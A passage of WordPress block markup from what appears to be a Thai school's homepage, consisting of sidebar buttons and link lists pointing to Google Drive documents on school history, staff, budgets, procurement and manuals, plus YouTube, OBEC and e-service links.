kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ 